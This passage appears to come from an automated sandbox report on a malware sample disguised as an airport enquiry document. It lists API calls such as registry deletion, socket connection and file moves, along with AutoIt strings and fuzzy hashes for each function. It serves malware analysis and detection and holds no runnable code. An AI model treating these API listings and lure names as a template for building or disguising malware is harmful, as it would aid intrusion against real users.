            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcsncpy$LocalTime
            • String ID:
            • API String ID: 2945705084-0
            • Opcode ID: 60fb4eb18dc395b2ca2ef871640d8805203bc268b187b50f8734935c7a48d04f
            • Instruction ID: 457de66400d3b48c7524bbb18f22ce60ea0f23fead4011f27a3f335408c5fe2a
            • Opcode Fuzzy Hash: 60fb4eb18dc395b2ca2ef871640d8805203bc268b187b50f8734935c7a48d04f
            • Instruction Fuzzy Hash: E641E6B6C2026976CB10EBB5CC86ACF77B89F06314F508562F518E3221E734D745E3A5
            APIs
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CE38D3,?), ref: 00CE48C7
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CE38D3,?), ref: 00CE48E0
            • lstrcmpiW.KERNEL32(?,?), ref: 00CE38F3
            • _wcscmp.LIBCMT ref: 00CE390F
            • MoveFileW.KERNEL32(?,?), ref: 00CE3927
            • _wcscat.LIBCMT ref: 00CE396F
            • SHFileOperationW.SHELL32(?), ref: 00CE39DB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
            • String ID: \*.*
            • API String ID: 1377345388-1173974218
            • Opcode ID: db7da8c298f9bee181626dfd1bddd012145f10ebf4a2889d7214482c63839b20
            • Instruction ID: 34fdbae8f234456399e4a48c8d575281376655275d8a597231555a279b4d0ed0
            • Opcode Fuzzy Hash: db7da8c298f9bee181626dfd1bddd012145f10ebf4a2889d7214482c63839b20
            • Instruction Fuzzy Hash: FA41BFB21083C49EC751EF65C485AEBB7E8AF88340F14092EB499C3192EB74E788C752
            APIs
            • _memset.LIBCMT ref: 00D07519
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D075C0
            • IsMenu.USER32(?), ref: 00D075D8
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D07620
            • DrawMenuBar.USER32 ref: 00D07633
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$DrawInfoInsert_memset
            • String ID: 0
            • API String ID: 3866635326-4108050209
            • Opcode ID: 3026bd99556300817bc46c11dd5c96baaa436361fd05aa89698eb0f980fac5a6
            • Instruction ID: b71c32ddb1b67f15ad41d3648b9dab77933a5454ced8f436c21c07d149e3fecd
            • Opcode Fuzzy Hash: 3026bd99556300817bc46c11dd5c96baaa436361fd05aa89698eb0f980fac5a6
            • Instruction Fuzzy Hash: CA411775A04609EFDB20DF54D884E9ABBF8FB09314F588129E95A9B390D731ED50CFA0
            APIs
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00D0125C
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D01286
            • FreeLibrary.KERNEL32(00000000), ref: 00D0133D
              • Part of subcall function 00D0122D: RegCloseKey.ADVAPI32(?), ref: 00D012A3
              • Part of subcall function 00D0122D: FreeLibrary.KERNEL32(?), ref: 00D012F5
              • Part of subcall function 00D0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D01318
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D012E0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: EnumFreeLibrary$CloseDeleteOpen
            • String ID:
            • API String ID: 395352322-0
            • Opcode ID: 6a42326cc067aa9c516fd9a0df7efc556756777617c104edd5824ef187b49e42
            • Instruction ID: 3544b472fdaefb57efc3f3db90cb115f9bebaf78bad743c4c9114a95d18f0cf1
            • Opcode Fuzzy Hash: 6a42326cc067aa9c516fd9a0df7efc556756777617c104edd5824ef187b49e42
            • Instruction Fuzzy Hash: 19312D75901219BFDB14DFA0DC89BFEB7BCEF08300F140169E509E2691DA749E859AB4
            APIs
            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D0655B
            • GetWindowLongW.USER32(01655828,000000F0), ref: 00D0658E
            • GetWindowLongW.USER32(01655828,000000F0), ref: 00D065C3
            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D065F5
            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D0661F
            • GetWindowLongW.USER32(?,000000F0), ref: 00D06630
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D0664A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongWindow$MessageSend
            • String ID:
            • API String ID: 2178440468-0
            • Opcode ID: c784e634109982c81e1d42df9bd2c710925d1ac94773701410b4a80ace1c6d22
            • Instruction ID: 5bb33fc8b12be720ecb2a3174d725780b10d46f290af47dd59fb2d9c1f163005
            • Opcode Fuzzy Hash: c784e634109982c81e1d42df9bd2c710925d1ac94773701410b4a80ace1c6d22
            • Instruction Fuzzy Hash: EE31D234604250AFDB21CF58DC89F553BE1FB4A710F6901A8F51ACB2F5CB62E860DB61
            APIs
              • Part of subcall function 00CF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CF64D9
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF64E8
            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CF6521
            • connect.WSOCK32(00000000,?,00000010), ref: 00CF652A
            • WSAGetLastError.WSOCK32 ref: 00CF6534
            • closesocket.WSOCK32(00000000), ref: 00CF655D
            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CF6576
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
            • String ID:
            • API String ID: 910771015-0
            • Opcode ID: 2c9a5fb5ee44c58bb60228590c0e98a01bf8cb777d687bd331b946f2cf76e7f6
            • Instruction ID: 5310e0985d43d7f60005b6ba1888fe690a5de87239a3092b0b3b94482c6a95c6
            • Opcode Fuzzy Hash: 2c9a5fb5ee44c58bb60228590c0e98a01bf8cb777d687bd331b946f2cf76e7f6
            • Instruction Fuzzy Hash: ED31B371600218AFDB50EF64CC85BBE7BB9EF44714F148069FA19E7291CB74AD04DBA2
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CDE0FA
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CDE120
            • SysAllocString.OLEAUT32(00000000), ref: 00CDE123
            • SysAllocString.OLEAUT32 ref: 00CDE144
            • SysFreeString.OLEAUT32 ref: 00CDE14D
            • StringFromGUID2.OLE32(?,?,00000028), ref: 00CDE167
            • SysAllocString.OLEAUT32(?), ref: 00CDE175
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: 0020e75511a25f70d319f7fc83607db3a31026974ca574a4bc5e1dae82944cff
            • Instruction ID: c38662c7892f2e3aa8a126399417794ed9a25bda0bd9058a681baf0a76fcfa37
            • Opcode Fuzzy Hash: 0020e75511a25f70d319f7fc83607db3a31026974ca574a4bc5e1dae82944cff
            • Instruction Fuzzy Hash: E2217735604209AFDB20BFA9DC88DAB77ECEB09760B108126FA55CB761DA70DD41CB64
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
            • API String ID: 1038674560-2734436370
            • Opcode ID: 92032145f7ff2024f6be9529021b579e2bf464a7114d7fe6a2c471ca3409e2ad
            • Instruction ID: 2878de8581054f0a4999e88e9b4c648a37bed6c8fc5b75d13f02746a3ed0a391
            • Opcode Fuzzy Hash: 92032145f7ff2024f6be9529021b579e2bf464a7114d7fe6a2c471ca3409e2ad
            • Instruction Fuzzy Hash: 992128321141557BD330A624DC12EB77398FF52344F14403BFA9786281EB519E93A2A5
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D078A1
            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D078AE
            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D078B9
            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D078C8
            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D078D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CreateObjectStockWindow
            • String ID: Msctls_Progress32
            • API String ID: 1025951953-3636473452
            • Opcode ID: 50dba222bd2070d242e53326e0a0b35858432f5018a21e9f55976bdd09101bac
            • Instruction ID: 70a363491ae9cf76e5175cbe9ef44728bf94e84e5cc9f043709d1fd3f7bfab89
            • Opcode Fuzzy Hash: 50dba222bd2070d242e53326e0a0b35858432f5018a21e9f55976bdd09101bac
            • Instruction Fuzzy Hash: 01118EB2510219BFEF159F60CC85EE77F6DEF08768F018115BA08A60A0C772AC21DBB4
            APIs
            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00CA4292,?), ref: 00CA41E3
            • GetProcAddress.KERNEL32(00000000), ref: 00CA41EA
            • EncodePointer.KERNEL32(00000000), ref: 00CA41F6
            • DecodePointer.KERNEL32(00000001,00CA4292,?), ref: 00CA4213
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
            • String ID: RoInitialize$combase.dll
            • API String ID: 3489934621-340411864
            • Opcode ID: 647b0b63484ef383e930aac4e96935f62f260aedfd144bd9e84fb4dbe0822d58
            • Instruction ID: cdbf1db3d3bef6ca314c038292e5bc5e3ecd7b49eb3e5ead40b5b79eefa45154
            • Opcode Fuzzy Hash: 647b0b63484ef383e930aac4e96935f62f260aedfd144bd9e84fb4dbe0822d58
            • Instruction Fuzzy Hash: 22E01AF8A90381AFEB205FB0FC09B543AA4B766707F208424F525E56E0DBB554D58F30
            APIs
            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CA41B8), ref: 00CA42B8
            • GetProcAddress.KERNEL32(00000000), ref: 00CA42BF
            • EncodePointer.KERNEL32(00000000), ref: 00CA42CA
            • DecodePointer.KERNEL32(00CA41B8), ref: 00CA42E5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
            • String ID: RoUninitialize$combase.dll
            • API String ID: 3489934621-2819208100
            • Opcode ID: 3ea95e449889fd92f81808879996b0907c7f8b7a54978999bc778282cf2d7774
            • Instruction ID: a2c7653bec2d27b17c80b55acc5d9a33fe1825d7c312f8de293ef0ec4048e992
            • Opcode Fuzzy Hash: 3ea95e449889fd92f81808879996b0907c7f8b7a54978999bc778282cf2d7774
            • Instruction Fuzzy Hash: A0E0B67C581301AFEB209F60FC0EB563AA4B726B56F304128F015E1AA0CBB545D4CA34
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$__itow__swprintf
            • String ID:
            • API String ID: 3253778849-0
            • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
            • Instruction ID: e9ba57d0d0cbd47a0c8f1797bce893ccbe11fb2a00840eb25339c7a07f9c75a3
            • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
            • Instruction Fuzzy Hash: AE61CD3051029A9BCF11FF61CC82EFE37A8AF5534CF084519F85A6B292EB34AD41EB50
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00548
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D00588
            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00D005AB
            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D005D4
            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D00617
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00624
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
            • String ID:
            • API String ID: 4046560759-0
            • Opcode ID: 390013dda8650a774cfbce96145da2ba273c10bcc1d7e4907d1f5d266ef6f4ee
            • Instruction ID: c3d46f8149b238cccc9fa592f494399c6bff2509f36f100ef890de867e90aec3
            • Opcode Fuzzy Hash: 390013dda8650a774cfbce96145da2ba273c10bcc1d7e4907d1f5d266ef6f4ee
            • Instruction Fuzzy Hash: B8514831108200AFCB14EB64C885F6FBBE9FF89714F18491DF599872A1DB71E905EB62
            APIs
            • GetMenu.USER32(?), ref: 00D05A82
            • GetMenuItemCount.USER32(00000000), ref: 00D05AB9
            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D05AE1
            • GetMenuItemID.USER32(?,?), ref: 00D05B50
            • GetSubMenu.USER32(?,?), ref: 00D05B5E
            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00D05BAF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$CountMessagePostString
            • String ID:
            • API String ID: 650687236-0
            • Opcode ID: 909e426fcccc6f113d2141173abf700f0163ceed1bba233582df79345f60c2c9
            • Instruction ID: 60e53c30b31287e4875cfb91588f938a612fe93b7dcff46cdbf6e7074446af10
            • Opcode Fuzzy Hash: 909e426fcccc6f113d2141173abf700f0163ceed1bba233582df79345f60c2c9
            • Instruction Fuzzy Hash: 51516C35A00615AFCB11AFA4D845BAEB7B4EF48314F144469EC5AA7391CB70BE41DFA0
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CDF3F7
            • VariantClear.OLEAUT32(00000013), ref: 00CDF469
            • VariantClear.OLEAUT32(00000000), ref: 00CDF4C4
            • _memmove.LIBCMT ref: 00CDF4EE
            • VariantClear.OLEAUT32(?), ref: 00CDF53B
            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CDF569
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$Clear$ChangeInitType_memmove
            • String ID:
            • API String ID: 1101466143-0
            • Opcode ID: cdbe361b74f3b20101615c44476dacfa8377ba10d4214ca501d037bcb150172b
            • Instruction ID: 0ed8c7f6c123e0e6708b3ca163cb585c0382f4aeea560ceed7e2ff20d12005fd
            • Opcode Fuzzy Hash: cdbe361b74f3b20101615c44476dacfa8377ba10d4214ca501d037bcb150172b
            • Instruction Fuzzy Hash: 13515D75A002099FCB10CF58D884AAAB7F8FF4C314B15816AEE59DB301E730E952CB60
            APIs
            • _memset.LIBCMT ref: 00CE2747
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2792
            • IsMenu.USER32(00000000), ref: 00CE27B2
            • CreatePopupMenu.USER32 ref: 00CE27E6
            • GetMenuItemCount.USER32(000000FF), ref: 00CE2844
            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CE2875
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
            • String ID:
            • API String ID: 3311875123-0
            • Opcode ID: b362be6c53b22af0fc08574344b949d3aaae54098ea7896ad42314c6408f9d32
            • Instruction ID: 7acc8555efddf57552d05d2650d6e8f4f5d1278df157cfc5e2c269909002dc5a
            • Opcode Fuzzy Hash: b362be6c53b22af0fc08574344b949d3aaae54098ea7896ad42314c6408f9d32
            • Instruction Fuzzy Hash: 90518F71A00385DBDF34CF6AD888BAEBBF9BF44314F104169E4259B2D1D7709A44CB51
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C8179A
            • GetWindowRect.USER32(?,?), ref: 00C817FE
            • ScreenToClient.USER32(?,?), ref: 00C8181B
            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C8182C
            • EndPaint.USER32(?,?), ref: 00C81876
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PaintWindow$BeginClientLongRectScreenViewport
            • String ID:
            • API String ID: 1827037458-0
            • Opcode ID: 9afc8a8c0f9fa09726fbdc80d84eb5727c5fb023416e22eef547f329e9dea0c0
            • Instruction ID: f654dac4477c74cc74df18fc5708cc55078231062c4a3ebc92c48c2c03216371
            • Opcode Fuzzy Hash: 9afc8a8c0f9fa09726fbdc80d84eb5727c5fb023416e22eef547f329e9dea0c0
            • Instruction Fuzzy Hash: 4C4180705043009FD710EF25CC85FB67BE8EB46728F180629F9A9C62E1C7719D46DB62
            APIs
            • ShowWindow.USER32(00D467B0,00000000,01655828,?,?,00D467B0,?,00D0B862,?,?), ref: 00D0B9CC
